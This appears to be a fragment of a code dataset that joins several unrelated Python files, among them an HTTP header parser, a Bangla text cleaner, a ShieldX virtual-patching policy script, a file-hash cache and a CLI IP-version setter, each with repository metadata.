response\n","repo_name":"etipsin/lovely-service","sub_path":"service/routing/v1/project.py","file_name":"project.py","file_ext":"py","file_size_in_byte":3199,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"13706335369","text":"# direct index access is difficult here, hence the linked list\nclass ListNode:\n def __init__(self, index, next_distance=0):\n self.index = index\n self.next = None\n self.next_distance = next_distance\n self.check = False\n\ndef solution(n, weak, dist): \n if len(weak) == 1:\n return 1\n answer = ''\n # build the outer wall as a circular linked list; use 'gap' locally so the 'dist' argument (friend ranges) is not clobbered\n head = prev = ListNode(weak[0])\n for w_idx in weak[1:-1]:\n gap = w_idx - prev.index\n cur = ListNode(w_idx, gap)\n prev.next = cur\n prev = cur\n # last node: close the circle, wrapping the distance around the wall of length n\n gap = (n-weak[-1]) + weak[0]\n tail = ListNode(weak[-1], gap)\n prev.next = tail\n tail.next = head\n \n # check which spots can be inspected\n count = 0\n \n return 
answer","repo_name":"SoniaComp/Algorithm_Python_2021","sub_path":"D-2/kakao2020/5_1.py","file_name":"5_1.py","file_ext":"py","file_size_in_byte":710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"28380102447","text":"from datetime import datetime\n\nclass HttpHeader:\n def __init__(self, req):\n self.request = req\n\n def __str__(self):\n return self.request\n\n def get_start_line(self):\n idx = self.request.find('\\n')\n if idx == -1:\n idx = len(self.request)\n return self.request[:idx]\n \n def get_start_line_without_version(self):\n line = self.get_start_line()\n idx = self.request.lower().find('http')\n if idx == -1:\n return line\n return self.request[:idx]\n\n def get_host_line(self):\n idx = self.request.lower().find(\"host\")\n if idx == -1:\n return None\n tmp = self.request[idx:]\n idx2 = tmp.find('\\n')\n return tmp[:idx2]\n\n def transform_request_header(self):\n tmp = self.request.replace(\"/1.1\", \"/1.0\").replace(\"keep-alive\", \"close\")\n return HttpHeader(tmp)\n\n def is_connect(self):\n return self.request.split(' ')[0].lower() == 'connect'\n\n def get_request(self):\n return self.request\n\n def get_version(self):\n idx = self.request.lower().find(\"http/\")\n return self.request[idx:idx+8]\n\n def get_host(self):\n host_line = self.get_host_line()\n if host_line is None:\n return host_line\n start = host_line.lower().find(\"host:\")\n return host_line[start + 6:-1]\n \n def get_port_num(self):\n request = self.request\n port = 80\n l_request = request.lower()\n lines = l_request.split('\\n')\n line = lines[0]\n splits = line.split(\" \")\n splits = splits[1].split(\":\")\n last_part = splits[-1].strip()\n try:\n port = (int)(last_part)\n except:\n pass\n for i in range(1, len(lines)):\n line = lines[i].replace(\" \", \"\")\n if line.startswith(\"host\"):\n parts = line.split(\":\")\n last_part = parts[-1].strip()\n try:\n port = (int)(last_part)\n except:\n pass\n return port\n\n @staticmethod\n def print_date_stamp():\n now = datetime.now()\n time = now.strftime(\"%H:%M:%S\")\n print(f\"{now.day} {now.strftime('%b')} {time} - \", end=\"\")\n","repo_name":"priyanshu87511/Computer-Networks-Lab","sub_path":"112001033_112001049_Assignment4/HttpHeader.py","file_name":"HttpHeader.py","file_ext":"py","file_size_in_byte":2274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"20479787519","text":"\"\"\"\nThis cleantext scripts functions solely depends on clean-text library.\nMost of the functions are copied from clean-text.\n\"\"\"\nimport re\nfrom bnlp.cleantext import constants\nfrom bnlp.corpus.corpus import BengaliCorpus as corpus\n\nfrom ftfy import fix_text\nfrom unicodedata import category, normalize\nfrom emoji import UNICODE_EMOJI, demojize, emojize\n\ndef fix_bad_unicode(text, normalization=\"NFC\"):\n return fix_text(text, normalization=normalization)\n\ndef fix_strange_quotes(text):\n \"\"\"\n Replace strange quotes, i.e., 〞with a single quote ' or a double quote \" if it fits better.\n \"\"\"\n text = constants.SINGLE_QUOTE_REGEX.sub(\"'\", text)\n text = constants.DOUBLE_QUOTE_REGEX.sub('\"', text)\n return text\n\ndef replace_urls(text, replace_with=\"\"):\n \"\"\"\n Replace all URLs in ``text`` str with ``replace_with`` str.\n \"\"\"\n return constants.URL_REGEX.sub(replace_with, text)\n\ndef replace_emails(text, replace_with=\"\"):\n \"\"\"\n Replace all emails in ``text`` str with ``replace_with`` str.\n \"\"\"\n return 
constants.EMAIL_REGEX.sub(replace_with, text)\n\ndef remove_substrings(text, to_replace, replace_with=\"\"):\n \"\"\"\n Remove (or replace) substrings from a text.\n Args:\n text (str): raw text to preprocess\n to_replace (iterable or str): substrings to remove/replace\n replace_with (str): defaults to an empty string, but\n can be set to replace substrings with a token.\n \"\"\"\n if isinstance(to_replace, str):\n to_replace = [to_replace]\n\n result = text\n for x in to_replace:\n result = result.replace(x, replace_with)\n return result\n\ndef remove_emoji(text):\n return remove_substrings(text, UNICODE_EMOJI[\"en\"])\n\ndef remove_number_or_digit(text, replace_with=\"\"):\n return re.sub(constants.BANGLA_DIGIT_REGEX, replace_with, text)\n\ndef remove_punctuations(text, replace_with=\"\"):\n for punc in corpus.punctuations:\n text = text.replace(punc, replace_with)\n \n return text\n\nclass CleanText(object):\n def __init__(\n self,\n fix_unicode=True,\n unicode_norm=True,\n unicode_norm_form=\"NFKC\",\n remove_url=False,\n remove_email=False,\n remove_number=False,\n remove_digits=False,\n remove_emoji=False,\n remove_punct=False,\n replace_with_url=\"\",\n replace_with_email=\"\",\n replace_with_number=\"\",\n replace_with_digit=\"\",\n replace_with_punct = \"\"\n ):\n self.fix_unicode = fix_unicode\n self.unicode_norm = unicode_norm\n self.unicode_norm_form = unicode_norm_form\n self.remove_url = remove_url\n self.remove_email = remove_email\n self.remove_number = remove_number\n self.remove_digits = remove_digits\n self.remove_emoji = remove_emoji\n self.remove_punct = remove_punct\n \n self.replace_with_url = replace_with_url\n self.replace_with_email = replace_with_email\n self.replace_with_number = replace_with_number\n self.replace_with_digit = replace_with_digit\n self.replace_with_punct = replace_with_punct\n\n def __call__(self, text: str) -> str:\n if text is None:\n text = \"\"\n text = str(text)\n text = fix_strange_quotes(text)\n\n if self.fix_unicode:\n text = fix_bad_unicode(text)\n if self.unicode_norm:\n text = normalize(self.unicode_norm_form, text)\n if self.remove_punct:\n text = remove_punctuations(text, replace_with=self.replace_with_punct)\n if self.remove_url:\n text = replace_urls(text, replace_with=self.replace_with_url)\n if self.remove_email:\n text = replace_emails(text, replace_with=self.replace_with_email)\n if self.remove_emoji:\n text = remove_emoji(text)\n if self.remove_digits:\n text = remove_number_or_digit(text, replace_with=self.replace_with_digit)\n if self.remove_number:\n text = remove_number_or_digit(text, replace_with=self.replace_with_number)\n\n return text\n\n","repo_name":"sagorbrur/bnlp","sub_path":"bnlp/cleantext/clean.py","file_name":"clean.py","file_ext":"py","file_size_in_byte":4121,"program_lang":"python","lang":"en","doc_type":"code","stars":251,"dataset":"github-code","pt":"94"} +{"seq_id":"2606964837","text":"# standard library\nimport os\nimport sys\nimport argparse\n\n# shieldx library\nfrom sxswagger.common.custom_logger import CustomLogger\nfrom sxswagger.sxapi.rest_session import RestSession as SxSession\n\nfrom sxswagger.sxapi.threat_prevention_policy import ThreatPrevention as TPP\nfrom sxswagger.sxapi.security_policy_set import SecurityPolicySets as SPS\nfrom sxswagger.sxapi.access_control_policy import AccessControl as ACL\nfrom sxswagger.sxapi.cloud_management import CloudManagement as CloudMgmt\n\nclass VirtualPatch(object):\n def __init__(self, rest_session, logger):\n # Logger\n self.logger = logger\n\n # 
Session\n self.rest_session = rest_session\n\n # Policy Mgmt\n self.tpp_mgmt = TPP(rest_session)\n self.sps_mgmt = SPS(rest_session)\n self.acl_mgmt = ACL(rest_session)\n self.cloud_mgmt = CloudMgmt(rest_session)\n\n # SX Info\n self._source_policy = \"All Threats\"\n self._default_acl_policy = \"Default ACL Policy\"\n\n # Payloads\n self._payload = PolicyPayload()\n\n # Cache All Threats\n self.all_threats_cache = {}\n self._cache_all_threats()\n\n def _cache_all_threats(self):\n tpp = self.tpp_mgmt.get_threat_prevention_policy_by_name(self._source_policy)\n all_threats = self.tpp_mgmt.get_threats_by_policy_id(tpp[\"id\"])\n\n for threat in all_threats:\n key = \"{}:{}\".format(threat[\"protocolID\"], threat[\"threatID\"])\n self.all_threats_cache[key] = threat\n\n def _create_resource_group(self, rg_name, rg_components):\n resource_group = self._payload.get_rg_payload()\n resource_group[\"name\"] = rg_name\n resource_group[\"description\"] = rg_components[\"description\"]\n resource_group[\"purpose\"] = rg_components[\"purpose\"]\n resource_group[\"resourceType\"] = rg_components[\"resource_type\"]\n resource_group[\"memberList\"] = rg_components[\"member_list\"]\n\n rg_id = self.cloud_mgmt.create_resource_group(resource_group)\n\n return rg_id\n\n def _delete_resource_group(self, rg_name):\n is_deleted = self.cloud_mgmt.remove_resource_group_by_name(rg_name)\n\n return is_deleted\n\n def _create_tpp(self, policy_name, tpp_components):\n self.logger.info(\"Creating TPP.\")\n tpp_id = 0\n specific_threats = list()\n\n # Get specific threats\n for threat in tpp_components[\"threats\"]:\n key = \"{}:{}\".format(threat[\"protocolID\"], threat[\"threatID\"])\n\n if key in self.all_threats_cache:\n specific_threats.append(self.all_threats_cache[key])\n else:\n # Rule not found, raise warning\n pass\n\n self.logger.info(\"Specific Threats: {}\".format(specific_threats))\n\n # TPP Payload\n tpp_payload = self._payload.get_tpp_payload()\n self.logger.info(\"TPP Payload - Template: {}\".format(tpp_payload))\n tpp_payload[\"name\"] = policy_name\n tpp_payload[\"rules\"] = [{\"specificThreats\": specific_threats}]\n self.logger.info(\"TPP Payload - Populated: {}\".format(tpp_payload))\n\n tpp_id = self.tpp_mgmt.create_threat_prevention_policy(tpp_payload)\n self.logger.info(\"TPP Created, ID: {}\".format(tpp_id))\n\n return tpp_id\n\n def _edit_response_actions(self, tpp_id, response_actions):\n threat_responses = self.tpp_mgmt.get_threat_responses_by_policy_id(tpp_id)\n\n for threat_response in threat_responses:\n threat_response[\"block\"] = response_actions[\"block\"]\n threat_response[\"policyId\"] = tpp_id\n\n # Bulk Edit - Response Action Payload\n response_payload = self._payload.get_tpp_response_payload()\n response_payload[\"id\"] = tpp_id\n response_payload[\"responses\"] = threat_responses\n\n is_bulk_edit_ok = self.tpp_mgmt.bulk_update_threat_responses(response_payload)\n\n return is_bulk_edit_ok\n\n def _delete_tpp(self, policy_name):\n is_deleted = False\n\n # Get TPP\n tpp = self.tpp_mgmt.get_threat_prevention_policy_by_name(policy_name)\n\n if tpp is not None:\n # Delete\n is_deleted = self.tpp_mgmt.delete_threat_prevention_policy_by_id(tpp[\"id\"])\n else:\n # TPP not found, NOOP\n pass\n\n return is_deleted\n\n def _create_sps(self, policy_name, sps_components):\n # Threat Prevention Policy\n tpp = self.tpp_mgmt.get_threat_prevention_policy_by_name(sps_components[\"threat_prevention\"])\n tpp_id = tpp[\"id\"]\n tpp_name = tpp[\"name\"]\n\n # Malware Policy\n malware_policy_id = 
None\n malware_policy_name = None\n\n # URL Filtering Policy\n url_filtering_policy_id = None\n url_filtering_policy_name = None\n\n # SPS Payload\n sps_payload = self._payload.get_sps_payload()\n sps_payload[\"name\"] = policy_name\n sps_payload[\"threatPreventionPolicyName\"] = tpp_name\n sps_payload[\"threatPreventionPolicyId\"] = tpp_id\n\n sps_id = self.sps_mgmt.create_security_policy_set(sps_payload)\n self.logger.info(\"SPS Created, ID: {}\".format(sps_id))\n\n return sps_id\n\n def _delete_sps(self, policy_name):\n is_deleted = False\n\n # Get SPS\n sps = self.sps_mgmt.get_sps_by_name(policy_name)\n\n if sps is not None:\n # Delete\n is_deleted = self.sps_mgmt.delete_security_policy_set_by_id(sps[\"id\"])\n else:\n # SPS not found, NOOP\n pass\n\n return is_deleted\n\n def _create_acl_rule(self, acl_rule_name, acl_rule_components):\n # Get Default Access Control Policy\n default_access_control_policy = self.acl_mgmt.get_acl_policies()[0]\n\n self.logger.info(\"Before Add - Default ACP: {}\".format(default_access_control_policy))\n\n # Clone ACL Rule and modify relevant fields\n new_acl_rule = default_access_control_policy[\"aclRules\"][0].copy()\n del(new_acl_rule[\"id\"])\n new_acl_rule[\"name\"] = acl_rule_name\n new_acl_rule[\"description\"] = acl_rule_components[\"description\"]\n new_acl_rule[\"spsId\"] = acl_rule_components[\"sps_id\"]\n new_acl_rule[\"destinationResourceGroupList\"] = [acl_rule_components[\"dst_rg\"]]\n\n # TODO\n # new_acl_rule[\"sourceResourceGroupList\"] = (compute from RG or NS created based on WL IP from vuln scanner)\n # new_acl_rule[\"destinationResourceGroupList\"] = (compute from RG or NS created based on WL IP from vuln scanner)\n\n # Append the new rule\n default_access_control_policy[\"aclRules\"].append(new_acl_rule)\n\n # Fix order number, newly created rule is #1\n acl_rules_count = len(default_access_control_policy[\"aclRules\"])\n\n for acl_rule in default_access_control_policy[\"aclRules\"]:\n acl_rule[\"orderNum\"] = acl_rules_count\n acl_rules_count -= 1\n\n self.logger.info(\"After Add - Default ACP: {}\".format(default_access_control_policy))\n\n is_updated = self.acl_mgmt.update_acl(default_access_control_policy)\n\n self.logger.info(\"ACL Update status: {}\".format(is_updated))\n\n return is_updated\n\n def _delete_acl_rule(self, acl_rule_name):\n # Get Default Access Control Policy\n default_access_control_policy = self.acl_mgmt.get_acl_policies()[0]\n\n self.logger.info(\"Before Del - Default ACP: {}\".format(default_access_control_policy))\n\n # Delete ACL Rule\n index = 0\n for acl_rule in default_access_control_policy[\"aclRules\"]:\n if acl_rule[\"name\"] == acl_rule_name:\n # Pop based on index\n _ = default_access_control_policy[\"aclRules\"].pop(index)\n break\n\n index += 1\n\n self.logger.info(\"After Del - Default ACP: {}\".format(default_access_control_policy))\n\n is_updated = self.acl_mgmt.update_acl(default_access_control_policy)\n\n self.logger.info(\"ACL Update status: {}\".format(is_updated))\n\n return is_updated\n\n def patch(self, artifact):\n # Application Discovery\n\n # 1. Analyze Vulnerability Scanner Output\n # 1a. CVE IDs to ShieldX Rule IDs\n # List of Rules [{\"pm_id\": 6, \"rule_id\": 10114}, ...]\n threat_rules = [{\"protocolID\": 6, \"threatID\": 10114}]\n\n # 1b. List of IP Address (workloads)\n scanner_report_ip_set = [\n {\"id\": 0, \"cidr\": \"192.168.131.5/32\"},\n {\"id\": 0, \"cidr\": \"192.168.131.51/32\"}\n ]\n\n # 2. 
Create/resuse a resource group for workloads, Insertion = MSN\n rg_name = artifact[\"rg_name\"]\n rg_components = {\n \"description\": \"Virtual Patch - RG\",\n \"purpose\": \"POLICY\",\n \"resource_type\": \"CIDR\",\n \"member_list\": scanner_report_ip_set\n }\n rg_id = self._create_resource_group(rg_name, rg_components)\n\n # 3. Locate/Create ACL Rule responsible for allowing relevant traffic\n\n # 4. Change the threat policy of the ACL\n\n # 4a. Create TPP\n tpp_name = artifact[\"tpp_name\"]\n tpp_components = {\n \"threats\": threat_rules\n }\n tpp_id = self._create_tpp(tpp_name, tpp_components)\n\n # 4b. Edit Response action of each threat to block\n response_actions = {\n \"block\": True\n }\n is_buld_edit_ok = self._edit_response_actions(tpp_id, response_actions)\n\n # 4c. Compute Malware Policy, URL Filtering Policy\n mp_name = None # \"WithSXCloud\"\n ufp_name = None # \"Default URL Filtering Policy\"\n\n # 4d. Create SPS. Note: URL Filtering and Malware Policies are not defined\n sps_name = artifact[\"sps_name\"]\n sps_components = {\n \"threat_prevention\": tpp_name,\n \"malware\": mp_name,\n \"url_filtering\": ufp_name,\n }\n sps_id = self._create_sps(sps_name, sps_components)\n\n # 4e. Create ACL Rule\n acl_rule_name = artifact[\"acl_rule_name\"]\n acl_rule_components = {\n \"description\": \"Virtual Patch - ACL Rule\",\n \"dst_rg\": rg_id,\n \"sps_id\": sps_id\n }\n is_updated = self._create_acl_rule(acl_rule_name, acl_rule_components)\n\n def check(self, artifact):\n # Check TPP, SPS and ACL Rule\n self.logger.info(\"Check TPP, SPS and ACL Rule.\")\n\n def cleanup(self, artifact):\n # Delete ACL Rule\n self._delete_acl_rule(artifact[\"acl_rule_name\"])\n\n # Delete Resource Group\n self._delete_resource_group(artifact[\"rg_name\"])\n\n # Delete SPS\n self._delete_sps(artifact[\"sps_name\"])\n\n # Delete TPP\n self._delete_tpp(artifact[\"tpp_name\"])\n\nclass PolicyPayload(object):\n def __init__(self):\n pass\n\n def get_tpp_payload(self):\n return {\n \"id\": 0,\n \"isEditable\": \"true\",\n \"tenantId\": 1,\n \"name\": \"dummy\",\n \"rules\": [\n \"dummy\"\n ]\n }\n\n def get_tpp_response_payload(self):\n return {\n \"id\": 0,\n \"responses\": [\n \"dummy\"\n ]\n }\n\n def get_sps_payload(self):\n return {\n \"tenantId\": 1,\n \"id\": 0,\n \"name\": \"dummy\",\n \"accessControlPolicyId\": 0,\n \"isEditable\": \"false\",\n \"isDlpPolicy\": \"false\",\n \"isAnomalyDetection\": \"false\",\n \"malwarePolicyName\": \"null\",\n \"malwarePolicyId\": \"null\",\n \"threatPreventionPolicyName\": \"null\",\n \"threatPreventionPolicyId\": \"null\",\n \"urlfilteringPolicyName\": \"null\",\n \"urlfilteringPolicyId\": \"null\"\n }\n\n def get_rg_payload(self):\n return {\n \"id\": 0,\n \"name\": \"dummy\",\n \"description\": \"dummy\",\n \"purpose\": \"dummy\",\n \"infraIDs\": [],\n \"dynamic\": \"false\",\n \"regex\": \"none\",\n \"resourceType\": \"dummy\",\n \"memberList\": \"dummy\"\n }\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"Virtual Patch tool.\")\n parser.add_argument(\"-i\",\"--ipaddress\", help=\"ShieldX - Mgmt. 
IP Address.\", required=True)\n parser.add_argument(\"-a\",\"--action\", default=\"check\", help=\"Action: patch | check | cleanup\", required=False)\n args = vars(parser.parse_args())\n\n # Take parameters\n ip = args[\"ipaddress\"]\n username = os.environ.get(\"SHIELDX_USER\")\n password = os.environ.get(\"SHIELDX_PASS\")\n action = args[\"action\"]\n\n # Initialize logger\n logger = CustomLogger().get_logger()\n\n if username is None or password is None:\n logger.warning(\"Please set username and password as environment variables.\")\n sys.exit()\n\n # Establish REST connection\n sx_session = SxSession(ip=ip, username=username, password=password)\n sx_session.login()\n\n try:\n # Initialize\n virtual_patch = VirtualPatch(sx_session, logger)\n\n # Artifacts\n artifact = {\n \"rg_name\": \"virtual_patch_rg\",\n \"tpp_name\": \"virtual_patch_tpp\",\n \"sps_name\": \"virtual_patch_sps\",\n \"acl_rule_name\": \"virtual_patch_acl_rule\",\n }\n\n # Proceed based on action\n if action.lower() == \"patch\":\n virtual_patch.patch(artifact)\n elif action.lower() == \"check\":\n virtual_patch.check(artifact)\n elif action.lower() == \"cleanup\":\n virtual_patch.cleanup(artifact)\n else:\n logger.warning(\"Unknown action, {}\".format(action))\n except KeyboardInterrupt as e:\n logger.info(\"Task done. Goodbye.\")\n except Exception as e:\n logger.error(e)\n \n # Logout\n sx_session.logout()\n\n# Sample Run\n# python virtual_patch.py -i 172.16.27.73\n","repo_name":"wantutz/aburame","sub_path":"aburame/shieldxqe/scripts/virtual_patch.py","file_name":"virtual_patch.py","file_ext":"py","file_size_in_byte":13810,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"94"} +{"seq_id":"5531129334","text":"import json\nimport os\nfrom typing import Dict, IO, ItemsView, List\n\nfrom .config_base import ConfigBase\nfrom .const import Const\nfrom .file_hash import FileHash\nfrom .hash_base import HashBase\nfrom ..util.overrides_decorator import overrides\n\n\nclass FileHashCache(HashBase):\n\n def __init__(self, path: str, config: ConfigBase):\n self.__setattr__(Const.FIELD_TYPE, self.data_type)\n self.__setattr__(Const.FIELD_VERSION, self.data_version)\n\n self._cache: Dict[str, FileHash] = {}\n self._dirty: bool = False\n self._path: str = path\n self._total_file_size: int = 0\n\n if config is None:\n raise RuntimeError('Config cannot be None')\n self._config = config\n\n # ------------------------------------------------------------------------------------------------------------\n\n @property\n @overrides(HashBase)\n def data_type(self) -> str:\n return Const.KEY_FILE_HASH\n\n @property\n @overrides(HashBase)\n def data_version(self) -> int:\n return 1\n\n # ------------------------------------------------------------------------------------------------------------\n\n # noinspection PyPep8Naming\n @property\n def FILE_HASH_TIME_THRESHOLD_SECONDS(self) -> int:\n return 3\n\n def __len__(self) -> int:\n return len(self._cache)\n\n def __contains__(self, item) -> bool:\n return item in self._cache\n\n def __getitem__(self, path) -> FileHash:\n return self._cache.get(path)\n\n # ------------------------------------------------------------------------------------------------------------\n\n def items(self) -> ItemsView[str, FileHash]:\n return self._cache.items()\n\n # ------------------------------------------------------------------------------------------------------------\n\n @property\n def total_file_size(self) -> int:\n return self._total_file_size\n\n 
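# Illustrative usage of this cache (added comment; '/photos' is a hypothetical path):\n # cache = FileHashCache('/photos', config)\n # cache.load()\n # size = cache.total_file_size # running byte total maintained as hashes are added\n\n 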
@total_file_size.setter\n def total_file_size(self, val: int) -> None:\n self._total_file_size = val\n\n def get(self, file_name, default_value=None) -> FileHash or None:\n return self._cache.get(file_name, default_value)\n\n # ------------------------------------------------------------------------------------------------------------\n\n def keys(self) -> List[str]:\n return list(self._cache.keys())\n\n # ------------------------------------------------------------------------------------------------------------\n\n def load(self) -> None:\n \"\"\"Loads FileHashes from from flat file storage\n \"\"\"\n if not os.path.isdir(self._path):\n raise NotADirectoryError('\"{name}\" is not a directory'.format(name=self._path))\n\n from .file_hash import FileHash\n\n # if we are forced to rehash all files, then we pretend\n # there was no file to load...\n if self._config.force_rehash:\n self._dirty = True\n return\n\n # we need to prevent dirty state as loading should not affect that flag at all\n dirty = self._dirty\n dot_file_name = os.path.join(self._path, Const.FILE_DOT_DHUNTER)\n\n if os.path.isfile(dot_file_name):\n # is header line read already?\n file_hash_meta_read = False\n\n with open(dot_file_name, 'r') as fh:\n for line in fh:\n line = line.strip('\\n').strip()\n\n if not line or line[0] == '#':\n continue\n\n if not file_hash_meta_read:\n # we need to read cache meta data. For now it is not really needed.\n file_hash_meta_read = True\n continue\n\n filehash = FileHash(line, self._config, dir_path=self._path, no_hash_calc=True)\n if filehash.exists():\n self.add(filehash)\n else:\n from .log import Log\n Log.w('File no longer exists: {}'.format(os.path.join(self._path, filehash.name)))\n dirty = True\n\n self._dirty = dirty\n\n def save(self) -> bool:\n \"\"\"Saves FileHash hashes into flat file storage\n \"\"\"\n if self._config.dont_save_dot_file:\n return True\n\n result = False\n if self._dirty:\n dot_file_name = os.path.join(self._path, Const.FILE_DOT_DHUNTER)\n\n with open(dot_file_name, 'w') as fh:\n fh.write('# {name} hash cache {url}\\n'.format(name=Const.APP_NAME, url=Const.APP_URL))\n self.save_to_fh(fh)\n\n result = True\n\n self._dirty = False\n\n return result\n\n def save_to_fh(self, fh: IO, save_if_non_dirty_too: bool = False) -> bool:\n result = False\n can_save = self._dirty\n\n if not self._dirty and save_if_non_dirty_too:\n can_save = True\n\n if can_save:\n # 1st row is JSON object with data for DirHash\n fh.write('{json}\\n'.format(json=self.to_json()))\n fh.write('\\n')\n\n # all the FileHash objects\n for file_hash in self._cache.values():\n fh.write('{json}\\n'.format(json=file_hash.to_json()))\n\n result = True\n\n return result\n\n # @overrides(HashBase)\n # def _get_json_export_attrs(self) -> List[str]:\n # return [self.data_type_filed_name, self.data_version_field_name]\n\n # ------------------------------------------------------------------------------------------------------------\n\n @overrides(HashBase)\n def to_json(self) -> str:\n attrs = self._get_base_attrs()\n attrs[Const.FIELD_COUNT] = len(self._cache)\n\n return json.dumps(attrs, separators=(',', ':'))\n\n # ------------------------------------------------------------------------------------------------------------\n\n def add(self, file_hash: FileHash) -> None:\n \"\"\"Add FileHash to internal cache storage\n\n :raises ValueError\n \"\"\"\n if not isinstance(file_hash, FileHash):\n raise ValueError('Unsupported data type {type}'.format(type=type(file_hash)))\n\n # check if we have this hash 
entry in cache already?\n if file_hash not in self._cache.values():\n # no, create new entry then\n self._add_finalize(file_hash)\n elif file_hash.name in self._cache:\n # we do, so let's check if that is for this particular file state\n current_file_hash = self._cache.get(file_hash.name)\n if file_hash != current_file_hash:\n # seems it is not. Most likely underlying data changed,\n # while filename and/or size did not. Need to replace old\n # entry with new one then.\n\n # in case size changed, we need to keep cached totals up to date\n self._total_file_size -= current_file_hash.size\n\n # drop the stale entry; _add_finalize below inserts the fresh one\n self.remove_by_name(file_hash.name)\n\n # update hash, and totals\n self._add_finalize(file_hash)\n\n def _add_finalize(self, file_hash: FileHash) -> None:\n # force file data hash calculation if not done yet\n if file_hash.hash is None:\n file_hash.calculate_hash()\n\n # store new object in cache\n self._cache[file_hash.name] = file_hash\n\n # update totals\n self._total_file_size += file_hash.size\n\n # flag cache dirty for saving\n self._dirty = True\n\n # if calculation of hash took more than FILE_HASH_TIME_THRESHOLD_SECONDS\n # we force cache file save on adding such hash to avoid re-hashing\n if file_hash.hash_time_seconds >= self.FILE_HASH_TIME_THRESHOLD_SECONDS:\n self.save()\n\n # ------------------------------------------------------------------------------------------------------------\n\n def replace(self, file_hash: FileHash) -> bool:\n \"\"\"Replaces existing FileHash entry with new one or just adds new entry if no file_hash is cached yet.\n :returns: True if an existing FileHash was replaced, False if it was just added\n \"\"\"\n replaced = False\n if file_hash.name in self._cache:\n del self._cache[file_hash.name]\n replaced = True\n\n self.add(file_hash)\n\n return replaced\n\n # ------------------------------------------------------------------------------------------------------------\n\n def remove(self, obj: os.DirEntry or FileHash or str) -> bool:\n \"\"\"Removes cached entry based on either DirEntry or FileHash data. Does nothing if object is not found\n \"\"\"\n if isinstance(obj, (FileHash, os.DirEntry)):\n return self.remove_by_name(obj.name)\n if isinstance(obj, str):\n return self.remove_by_name(obj)\n\n raise ValueError('Unsupported argument type \"{}\"'.format(type(obj)))\n\n def remove_by_name(self, name: str) -> bool:\n \"\"\"Removes cached file entry based on file name. Does nothing if object is not found\n \"\"\"\n result = False\n if name in self._cache:\n del self._cache[name]\n self._dirty = True\n result = True\n\n return result\n","repo_name":"MarcinOrlowski/dhunter","sub_path":"dhunter/core/file_hash_cache.py","file_name":"file_hash_cache.py","file_ext":"py","file_size_in_byte":9204,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"23063772057","text":"'''Write a program that reads the width and the height of a wall in meters, computes its area and the amount of\npaint needed to paint it, knowing that each liter of paint covers an area of 2 square meters.'''\n\nlargura = float(input(\"Enter the width of the wall: \"))\naltura = float(input(\"Enter the height of the wall: \"))\n\ncalc = largura * altura\n\npintura = calc / 2 # each liter of paint covers 2 square meters, per the problem statement\n\nprint(f'The wall has an area of {calc}m²')\nprint(f'Painting the wall will take {pintura}l of paint. 
')\n","repo_name":"GuilhermeSams/Exercicios-Curso-em-Video","sub_path":"011 Exercício - Pintando Parede.py","file_name":"011 Exercício - Pintando Parede.py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"16222803336","text":"# -*- coding:utf-8 -*-\n'''\n#==========================================================================\n# @Method: Set IP versions.\n# @command: setdns\n# @Param:\n# @author:\n# @date: 2017.7.21\n#==========================================================================\n'''\nimport sys\n\nFAILURE_MESS = 'Failure: some of the settings failed.\\\n possible causes include the following: '\n\n\ndef setipversion_init(parser, parser_list):\n '''\n #====================================================================================\n # @Method: Register IP protocol commands.\n # @Param: parser, major command argparser\n parser_list, save subcommand parser list\n # @Return:\n # @author:\n #====================================================================================\n '''\n sub_parser = parser.add_parser('setipversion', help='''set IP version''')\n sub_parser.add_argument('-M', dest='IPVersion',\n type=str, required=True, \\\n choices=['IPv4AndIPv6', 'IPv4', 'IPv6'], \\\n help='''whether IPv4/IPv6 protocol is enabled''')\n parser_list['setipversion'] = sub_parser\n\n return 'setipversion'\n\n\ndef package_request(args, payload):\n '''\n #====================================================================================\n # @Method: Encapsulate the request body.\n # @Param:args,payload\n # @Return:\n # @author:\n #====================================================================================\n '''\n huawei = {}\n oem = {}\n huawei[\"IPVersion\"] = args.IPVersion\n oem[\"Huawei\"] = huawei\n payload[\"Oem\"] = oem\n\n\ndef part_err(ck_message):\n '''\n #====================================================================================\n # @Method: 200 messages\n # @Param:idx, ck_message\n # @Return:\n # @date:2017.07.29 16:26\n #====================================================================================\n '''\n idx = 0\n while idx < len(ck_message):\n check_info = ck_message[idx]['Message']\n message = \"%s%s\" % \\\n (check_info[0].lower(), check_info[1:len(check_info) - 1])\n message = message.replace(\"Oem/Huawei/\", \"\")\n print(' %s' % message)\n idx += 1\n\n\ndef all_err(ck_message):\n '''\n #====================================================================================\n # @Method: 400 messages\n # @Param:idx, ck_message\n # @Return:\n # @date:2017.08.29 8:26\n #====================================================================================\n '''\n idx = 0\n while idx < len(ck_message):\n check_info = ck_message[idx]['Message']\n message = \"%s%s\" % \\\n (check_info[0].lower(), check_info[1:len(check_info) - 1])\n message = message.replace(\"Oem/Huawei/\", \"\")\n if idx == 0:\n print('%s' % message)\n else:\n print(' %s' % message)\n idx += 1\n\n\ndef check_err_info(resp_ver, code_ipv):\n '''\n #====================================================================================\n # @Method: Determine whether all attributes are set successfully. 
